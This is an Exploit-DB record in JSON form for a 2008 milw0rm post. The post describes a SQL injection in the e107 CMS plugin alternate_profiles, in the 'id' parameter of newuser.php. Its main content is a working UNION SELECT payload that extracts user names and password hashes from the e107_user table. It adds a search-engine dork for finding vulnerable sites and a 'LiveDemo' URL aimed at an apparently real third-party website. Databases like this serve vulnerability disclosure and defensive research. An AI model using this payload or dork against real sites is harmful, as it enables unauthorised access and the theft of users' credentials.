{"id": "EDB-ID:6849", "vendorId": null, "type": "exploitdb", "bulletinFamily": "exploit", "title": "e107 Plugin alternate_profiles - 'id' SQL Injection", "description": "", "published": "2008-10-27T00:00:00", "modified": "2008-10-27T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "cvss2": {}, "cvss3": {}, "href": "https://www.exploit-db.com/exploits/6849", "reporter": "boom3rang", "references": [], "cvelist": ["2008-4785"], "immutableFields": [], "lastseen": "2022-01-13T07:04:40", "viewCount": 15, "enchantments": {"dependencies": {}, "score": {"value": 0.5, "vector": "NONE"}, "backreferences": {}, "exploitation": null, "vulnersScore": 0.5}, "sourceHref": "https://www.exploit-db.com/download/6849", "sourceData": "#############################################################\r\ne107 Plugin alternate_profiles (newuser.php?id) Remote SQL-injetion Vulnerability\r\n#############################################################\r\n[~] Author boom3rang\r\n--------------------------------\r\n[~] Site www.khg-crew.ws\r\n--------------------------------\r\n[~] Greetz KHG & H!tm@N & chs & redc00de & proxy-ki11er & Hurley\r\n--------------------------------\r\n[!] Script Name: E107\r\n[!] Plugin Vuln: alternate_profiles/newuser.php?id=\r\n[!] Dork: inurl:\"/alternate_profiles/\r\n#############################################################\r\n\r\n---------------------------------------------------------------------------------------------------\r\n[-] POC:\r\nhttp://localhost/e107_plugins/alternate_profiles/newuser.php?id=[exploit]\r\n---------------------------------------------------------------------------------------------------\r\n[-] Exploit:\r\n-9999+union+all+select+1,concat(user_name,char(58),user_password),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31+from+e107_user/*\r\n---------------------------------------------------------------------------------------------------\r\n[-] LiveDemo:\r\nhttp://briefcaseit.com/e107_plugins/alternate_profiles/newuser.php?id=-9999+union+all+select+1,concat(user_name,char(58),user_password),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31+from+e107_user/*\r\n---------------------------------------------------------------------------------------------------\r\n#########################################\r\n- United States of Albania\r\n- Proud to be Albanian\r\n- Proud to be Muslim\r\n#########################################\r\n\r\n# milw0rm.com [2008-10-27]", "osvdbidlist": ["49451"], "exploitType": "webapps", "verified": true, "_state": {"dependencies": 1647504961}}
{}